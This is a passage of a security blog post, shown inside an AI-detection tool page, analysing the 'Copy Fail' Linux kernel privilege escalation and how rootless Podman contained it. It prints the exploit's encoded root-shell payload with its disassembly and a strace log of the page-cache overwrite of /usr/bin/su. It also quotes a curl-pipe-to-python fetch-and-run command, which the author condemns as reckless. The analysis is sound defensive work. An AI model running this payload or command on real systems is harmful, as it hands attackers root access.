CVE-2026-31431: Copy Fail vs. rootless containers

D dragonsreach.it ↗

▲ 205 points • 123 comments • by averi • 2mo ago • HN discussion ↗

Pangram verdict · v3.3

We believe that this document is fully human-written

22 %

AI likelihood · overall

Human

100% human-written 0% AI-generated

SEGMENTS · HUMAN 4 of 7

SEGMENTS · AI 0 of 7

WORD COUNT 1,358

PEAK AI % 42% · §2

Analyzed

May 5

backend: pangram/v3.3

Segments scanned

7 windows

avg 194 words each

Distribution

100 / 0%

human / AI fraction

Verdict

Human

Pangram v3.3

Article text · 1,358 words · 7 segments analyzed

Human AI-generated

§1 Human · 12%

Table of ContentsTable of ContentsIntroductionThe vulnerabilityAnalyzing the shellcodeSetting up the labSetting up rootless PodmanRunning the exploit inside a containerTracing the exploit mechanismWhy rootless containers stopped the escalationCatching the kernel in the act with eBPFThe uid_map proofConclusionsIntroductionIn the previous post about SELinux MCS and GitLab runners, I briefly mentioned CVE-2026-31431 (“Copy Fail”) as a motivating example for per-job VM isolation. After that post went out I spent the weekend setting up a lab to actually run the exploit, trace it at the syscall level, and verify that the rootless Podman architecture we deploy on GNOME’s runners would contain it. This post documents the entire process: from disassembling the shellcode to watching the kernel reject the privilege escalation in real time.The vulnerabilityFor a full technical breakdown of the root cause, the scatterlist mechanics, and the disclosure timeline, read Theori’s excellent writeup at xint.io/blog/copy-fail-linux-distributions. In this blog post we’ll initially analyze the shellcode embedded in the public exploit, then set up a lab to run it inside a rootless container and subsequently trace what happens at the kernel level.Analyzing the shellcodeIn the days following the disclosure I noticed a lot of people running the exploit on their systems without bothering to check what the shellcode actually does. Executing a compressed binary blob from a GitHub repository you have never audited is not a great security practice — for all you know it could be exfiltrating data or dropping a backdoor alongside the privilege escalation. So before running anything, let’s look at what the actual shellcode contains.The shellcode is embedded in the Python exploit as a compressed and hex-encoded string:78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a

§2 Mixed · 42%

154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56 c3ff593611fcacfa499979fac5190c0c0c0032c310d3 The script uses zlib.decompress() to turn this into raw bytes. To extract and inspect the payload:#!/usr/bin/env python3 import zlib

hex_str = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"

compressed_bytes = bytes.fromhex(hex_str) raw_payload = zlib.decompress(compressed_bytes)

with open("shellcode.bin", "wb") as f: f.write(raw_payload)

print(f"Payload extracted: {len(raw_payload)} bytes") Running file on the extracted binary confirms what we expect:shellcode.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked... This is not raw shellcode — it is a fully formed ELF executable. The exploit overwrites the beginning of /usr/bin/su with this tiny binary. When the OS executes su, it loads the corrupted pages from the page cache and runs the malicious ELF instead of the legitimate utility.

§3 Mixed · 35%

The standard objdump -d shellcode.bin produces no output because the exploit author used a technique called ELF golfing — stripping the Section Headers to compress the payload down to a few dozen bytes. Without a .text section, objdump gives up. To force raw disassembly:objdump -D -b binary -m i386:x86-64 shellcode.bin The first ~0x77 bytes are ELF header data that objdump tries to interpret as assembly, producing nonsensical add %al,(%rax) instructions. The actual code begins at offset 0x78. Here is the full disassembly with annotations:The setuid(0) syscall (offsets 0x78 to 0x7e): 78: 31 c0 xor %eax,%eax 79: 31 ff xor %edi,%edi 7c: b0 69 mov $0x69,%al 7e: 0f 05 syscall xor %edi, %edi sets rdi to 0 — the first argument for the syscall. mov $0x69, %al loads 105 (decimal), which is the Linux x64 syscall number for setuid. The syscall instruction executes setuid(0).The execve("/bin/sh") syscall (offsets 0x80 to 0x8d): 80: 48 8d 3d 0f 00 00 00 lea 0xf(%rip),%rdi 87: 31 f6 xor %esi,%esi 89: 6a 3b push $0x3b 8b: 58 pop %rax 8c: 99 cltd 8d: 0f 05 syscall lea 0xf(%rip), %rdi is a RIP-relative load — it looks 15 bytes ahead of the current instruction pointer, which lands exactly at offset 0x96, the start of the /bin/sh string.

§4 Human · 26%

xor %esi, %esi sets argv to NULL. The push $0x3b / pop %rax sequence is a golfing trick to load 59 (execve) in fewer bytes than mov rax, 59. cltd sign-extends eax into edx, zeroing the third argument (envp) with a single byte. The final syscall executes execve("/bin/sh", NULL, NULL).The clean exit (offsets 0x8f to 0x94): 8f: 31 ff xor %edi,%edi 91: 6a 3c push $0x3c 93: 58 pop %rax 94: 0f 05 syscall If execve somehow fails, the payload calls exit(0) (syscall 60) rather than crashing.The hardcoded string (offsets 0x96 to 0x9d): 96: 2f (bad) 97: 62 69 6e 2f 73 (bad) 9c: 68 .byte 0x68 9d: 00 00 add %al,(%rax) objdump marks these as (bad) because it is trying to decode data as instructions. Converting the hex bytes 2f 62 69 6e 2f 73 68 00 to ASCII yields /bin/sh\0 — the null-terminated string that the lea instruction at offset 0x80 points to.Setting up the labTo reproduce the vulnerability I provisioned a Fedora 43 VM using virt-install.

§5 Human · 14%

The kernel I had installed was 6.17.1-300.fc43.x86_64, which predates the fix entirely — the patch was backported into the stable 6.19.x tree starting with 6.19.12, so the entire 6.17.x line is vulnerable.virt-install \ --name cve-2026-31431 \ --vcpus 4 \ --memory 4096 \ --disk path=/var/lib/libvirt/images/cve-2026-31431.qcow2,size=20,bus=virtio,format=qcow2 \ --network bridge=virbr0,model=virtio \ --location 'https://download.fedoraproject.org/pub/fedora/linux/releases/43/Everything/x86_64/os/' \ --initrd-inject=/tmp/vm.ks \ --extra-args="inst.ks=file:/vm.ks console=ttyS0,115200n8" \ --graphics none Setting up rootless PodmanOn the Fedora VM, I configured rootless Podman following the same patterns we use on GNOME’s GitLab runners — a dedicated podman system user with linger enabled, pasta for networking (the modern replacement for slirp4netns), and a large Sub-UID/Sub-GID allocation.dnf install -y podman

useradd -m podman

usermod --add-subuids 100000-165535 --add-subgids 100000-165535 podman

loginctl enable-linger podman

su - podman -c 'podman run --rm alpine echo "Rootless Podman is working!"' Running the exploit inside a containerRunning strace inside a container requires two overrides: --cap-add=SYS_PTRACE (container runtimes drop this capability by default) and --security-opt seccomp=unconfined (the default seccomp profile blocks ptrace). Without both, strace will fail immediately with PTRACE_TRACEME: Operation not permitted.

§6 Human · 17%

I downloaded copy_fail_exp.py into a local directory beforehand — the /vuln mount in the command below points to that directory. Worth noting: I also saw people running the exploit via curl https://copy.fail/exp | python3 && su directly, which is just as reckless as running the shellcode without inspecting it first. Always download, read, and understand what you are about to execute.From the host VM as the podman user:podman run --rm -it \ --cap-add=SYS_PTRACE \ --security-opt seccomp=unconfined \ -v $(pwd):/vuln:Z \ -w /vuln \ fedora:43 bash Inside the container, I installed strace, created an unprivileged test user, and ran the exploit:dnf install -y strace python3 su -y useradd testuser chown testuser:testuser copy_fail_exp.py cp /root/copy_fail_exp.py /home/testuser

su - testuser -c "strace -f -e trace=socket,bind,setsockopt,sendmsg,splice,execve,setuid -o python_trace.txt python3 copy_fail_exp.py" Tracing the exploit mechanismThe strace output captured the exact mechanism by which the vulnerability corrupts the page cache. The exploit loops over the shellcode payload, writing it four bytes at a time into the in-memory cache of /usr/bin/su:169 socket(AF_ALG, SOCK_SEQPACKET|SOCK_CLOEXEC, 0) = 4 169 bind(4, {sa_family=AF_ALG, salg_type="aead", salg_feat=0, salg_mask=0, salg_name="authencesn(hmac(sha256),cbc(aes))"}, 88) = 0 169 setsockopt(4, SOL_ALG, ALG_SET_KEY, "\10\0\1\0...", 40) = 0 169 setsockopt(4, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4)

§7 Mixed · 41%

= 0 169 sendmsg(5, {msg_iov=[{iov_base="AAAA\177ELF", iov_len=8}]}, MSG_MORE) = 8 169 splice(3, [0], 7, NULL, 4, 0) = 4 169 splice(6, NULL, 5, NULL, 4, 0) = 4 Step by step:The script creates an AF_ALG socket — the kernel’s userspace cryptographic API, available to unprivileged users by defaultIt binds to authencesn(hmac(sha256),cbc(aes)), the specific cipher whose ESN scratch write triggers the bugsendmsg delivers an 8-byte message. The first four bytes (AAAA) are padding; the next four (\177ELF) are the data to write — the start of the ELF header. In later iterations, different 4-byte chunks of the shellcode are sent (e.g., iov_base="AAAA1\3001\377")splice() transfers page cache pages of /usr/bin/su into the crypto socket’s buffer without copying to userspace. The kernel’s authencesn scratch write then deposits those four bytes from sendmsg directly into the page cache, bypassing file permissions entirelyThis pattern repeats dozens of times until the entire malicious ELF payload is staged into the page cache. At the end:170 execve("/usr/sbin/su", ["su"], 0x559f5d7fbe50 /* 22 vars */) = 0 170 execve("/bin/sh", NULL, NULL) = 0 The script executes su, which loads from the corrupted page cache and runs the malicious payload instead of the legitimate binary.Why rootless containers stopped the escalationThe exploit successfully overwrote /usr/bin/su in the page cache, executed the shellcode, and escalated to root inside the container — the prompt changed to [root@ce307d49e132 testuser]# and setuid(0) returned success. But that root is contained by User Namespace UID mappings.Rootless Podman relies on Linux User Namespaces.